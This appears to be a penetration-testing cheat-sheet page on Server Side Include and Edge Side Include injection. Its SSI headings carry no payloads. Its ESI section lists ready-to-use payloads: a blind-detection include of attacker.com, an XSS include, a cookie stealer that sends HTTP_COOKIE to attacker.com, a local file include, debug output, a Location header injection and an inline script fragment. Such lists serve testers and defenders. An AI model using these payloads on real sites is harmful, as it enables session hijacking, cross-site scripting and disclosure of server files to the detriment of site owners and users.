SSI / ESI Injection
Server Side Include Injection
Last updated
Was this helpful?
Server Side Include Injection
Last updated
Was this helpful?
Print a date
Print all the variabels
Include a file
Doing a reverse shell
Blind detection
<esi:include src=http://attacker.com>
XSS
<esi:include src=http://attacker.com/XSSPAYLOAD.html>
Cookie stealer
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
Include a file
<esi:include src="supersecret.txt">
Display debug info
<esi:debug/>
Add header
<!--esi $add_header('Location','http://attacker.com') -->
Inline fragment
<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>